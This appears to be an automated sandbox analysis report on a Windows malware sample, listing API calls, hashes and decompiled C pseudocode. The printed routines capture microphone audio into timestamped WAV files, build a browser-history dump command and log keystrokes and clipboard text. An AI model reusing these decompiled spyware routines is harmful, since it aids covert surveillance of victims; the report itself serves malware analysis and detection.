                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                                                                • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                                                                  • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                                                                  • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                                                                  • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                                                                  • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                                                                  • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                                                                  • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                                                                  • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 3909728815-0
                                                                                • Opcode ID: f7bc1bf121c0d1dec5c1e58393eac45501402c9de18fe7a224fb86ccbd9269ea
                                                                                • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                                                                • Opcode Fuzzy Hash: f7bc1bf121c0d1dec5c1e58393eac45501402c9de18fe7a224fb86ccbd9269ea
                                                                                • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401640, Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 102stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E00401640(void* __edx, intOrPtr _a8, char _a11) {
				char _v5;
				char _v12;
				void* _v28;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char _v188;
				int _t23;
				char* _t25;
				char* _t32;
				char* _t33;
				char* _t34;
				CHAR* _t36;
				intOrPtr _t37;
				void* _t56;

				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
				if(_a8 == 0x3c0) {
					__imp__time( &_v12, _t56);
					_t25 =  &_v12;
					__imp__localtime(_t25);
					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
					_t32 =  &_v76;
					L00414152();
					_t33 =  &_v108;
					L0041414C();
					_t34 =  &_v60;
					L00414146();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E004013BE(_t34, 0x41b1a0);
					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					0x41b1a0->lpData = _t36;
					_t37 =  *0x41b1d8; // 0x0
					 *0x41b1a4 = _t37;
					 *0x41b1a8 = 0;
					 *0x41b1ac = 0;
					 *0x41b1b0 = 0;
					 *0x41b1b4 = 0;
					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t23;
			}




















                                                                                0x00401649
                                                                                0x00401650
                                                                                0x0040165d
                                                                                0x00401668
                                                                                0x0040166e
                                                                                0x00401672
                                                                                0x00401687
                                                                                0x0040169e
                                                                                0x004016bb
                                                                                0x004016c4
                                                                                0x004016cd
                                                                                0x004016d1
                                                                                0x004016da
                                                                                0x004016de
                                                                                0x004016ea
                                                                                0x004016f3
                                                                                0x004016fc
                                                                                0x00401705
                                                                                0x0040170e
                                                                                0x00401717
                                                                                0x00401726
                                                                                0x0040172d
                                                                                0x0040173d
                                                                                0x00401748
                                                                                0x0040174e
                                                                                0x00401753
                                                                                0x00401758
                                                                                0x0040175f
                                                                                0x00401764
                                                                                0x00401769
                                                                                0x0040176e
                                                                                0x0040177c
                                                                                0x0040178b
                                                                                0x00401791
                                                                                0x00401795
                                                                                0x0040179c

                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                                                                • time.MSVCRT ref: 00401668
                                                                                • localtime.MSVCRT ref: 00401672
                                                                                • strftime.MSVCRT ref: 00401687
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                                                                  • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                                                                • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                                                                • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                                                                • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                                                                • String ID: %Y-%m-%d %H.%M$.wav
                                                                                • API String ID: 4079669728-3597965672
                                                                                • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                                                                • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                                                                • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                                                                • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004013BE, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 154fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E004013BE(long _a4, void** _a8) {
				void _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				signed int _t37;
				signed int _t41;
				void* _t82;
				signed int _t83;
				signed int _t89;

				_t83 =  *0x41b21a & 0x0000ffff;
				_t37 = ( *0x41b226 & 0x0000ffff) * _t83;
				_v20 = _t37 *  *0x41b21c >> 3;
				asm("cdq");
				_t89 = 8;
				_v16 = 1;
				_v12 = 0x10;
				_v24 = _t37 / _t89;
				_t41 = _a8[1] * _t83;
				_v28 = _t41;
				_v8 = _t41 + 0x24;
				_t82 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t82 != 0xffffffff) {
					WriteFile(_t82, "RIFF", 4,  &_a4, 0);
					WriteFile(_t82,  &_v8, 4,  &_a4, 0);
					WriteFile(_t82, "WAVE", 4,  &_a4, 0);
					WriteFile(_t82, "fmt ", 4,  &_a4, 0);
					WriteFile(_t82,  &_v12, 4,  &_a4, 0);
					WriteFile(_t82,  &_v16, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b21a, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b21c, 4,  &_a4, 0);
					WriteFile(_t82,  &_v20, 4,  &_a4, 0);
					WriteFile(_t82,  &_v24, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b226, 2,  &_a4, 0);
					WriteFile(_t82, "data", 4,  &_a4, 0);
					WriteFile(_t82,  &_v28, 4,  &_a4, 0);
					WriteFile(_t82,  *_a8, _a8[1],  &_a4, 0);
					CloseHandle(_t82);
					return 1;
				}
				return 0;
			}














                                                                                0x004013c4
                                                                                0x004013d2
                                                                                0x004013e4
                                                                                0x004013e9
                                                                                0x004013ea
                                                                                0x00401401
                                                                                0x00401408
                                                                                0x0040140f
                                                                                0x00401418
                                                                                0x0040141b
                                                                                0x00401421
                                                                                0x0040142a
                                                                                0x0040142f
                                                                                0x0040144b
                                                                                0x00401459
                                                                                0x00401468
                                                                                0x00401477
                                                                                0x00401485
                                                                                0x00401493
                                                                                0x004014a2
                                                                                0x004014b1
                                                                                0x004014bf
                                                                                0x004014cd
                                                                                0x004014dc
                                                                                0x004014eb
                                                                                0x004014f9
                                                                                0x00401509
                                                                                0x0040150c
                                                                                0x00000000
                                                                                0x00401512
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,0041B1A0), ref: 0040144B
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,0041B1A0), ref: 00401459
                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,0041B1A0), ref: 00401468
                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,0041B1A0), ref: 00401477
                                                                                • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,0041B1A0), ref: 00401485
                                                                                • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,0041B1A0), ref: 00401493
                                                                                • WriteFile.KERNEL32(00000000,0041B21A,00000002,00000010,00000000,?,0041B1A0), ref: 004014A2
                                                                                • WriteFile.KERNEL32(00000000,0041B21C,00000004,00000010,00000000,?,0041B1A0), ref: 004014B1
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014BF
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,0041B1A0), ref: 004014CD
                                                                                • WriteFile.KERNEL32(00000000,0041B226,00000002,00000010,00000000,?,0041B1A0), ref: 004014DC
                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,0041B1A0), ref: 004014EB
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Write$Create
                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                • API String ID: 1602526932-4212202414
                                                                                • Opcode ID: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                                                                • Instruction ID: 91b5b913efd348db76e64cf746c5e08b94ff9205a7cc9a5ceb03776573d28bcb
                                                                                • Opcode Fuzzy Hash: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                                                                • Instruction Fuzzy Hash: 6F411CB654021CBAD7109BA1DC89FEB7FBCEBC5B10F008416BA06EA181D674D744CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401B26, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 105sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                                                                  • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                                                                  • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                                                                  • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                                                                  • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                                                                  • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                                                                  • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                                                                  • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                                                                  • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                                                                  • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                                                                  • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • Sleep.KERNEL32(000000FA), ref: 00401C24
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C52
                                                                                Strings
                                                                                • /sort "Visit Time" /stext ", xrefs: 00401B97
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$??1?$basic_string@G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@$D@1@@G@2@@0@Hstd@@V?$basic_string@$FileV01@@rand$CreateG@1@@ModuleNameSleepV01@V10@V10@0@V10@@Y?$basic_string@srandtime
                                                                                • String ID: /sort "Visit Time" /stext "
                                                                                • API String ID: 1247708949-1573945896
                                                                                • Opcode ID: 15380f9020f2495fc63fd211ba897ffcbb266c4ce663281b2abc4c34919e7592
                                                                                • Instruction ID: 821258ceffa38abf0b50ebb2211f36aec7c07e94205cba95cd2ca02b6bdb4f84
                                                                                • Opcode Fuzzy Hash: 15380f9020f2495fc63fd211ba897ffcbb266c4ce663281b2abc4c34919e7592
                                                                                • Instruction Fuzzy Hash: B131127290050DEBCB04EBE0ED4D9DE777CEB58345F104036F902E7090EA759A49CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406952, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,00017DA8,?), ref: 0040697B
                                                                                • toupper.MSVCRT ref: 0040698A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                                                                • toupper.MSVCRT ref: 00406A61
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                                                                  • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                                                                  • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                                                                  • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                                                                  • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,00017DA8,?), ref: 004069D7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,00017DA8,?), ref: 00406A01
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,00017DA8,?), ref: 00406A0B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,00017DA8,?), ref: 00406A1D
                                                                                • tolower.MSVCRT ref: 00406A3A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                                                                Strings
                                                                                • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                                                                • [End of clipboard text], xrefs: 004069EC
                                                                                • [Ctrl + , xrefs: 00406996
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                                                                • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                                                                • API String ID: 1567161615-398269065
                                                                                • Opcode ID: cf0a1cabc19c6348f430c56bfe5fb8f2978aed057767012fd5bc2789169d9336
                                                                                • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                                                                • Opcode Fuzzy Hash: cf0a1cabc19c6348f430c56bfe5fb8f2978aed057767012fd5bc2789169d9336
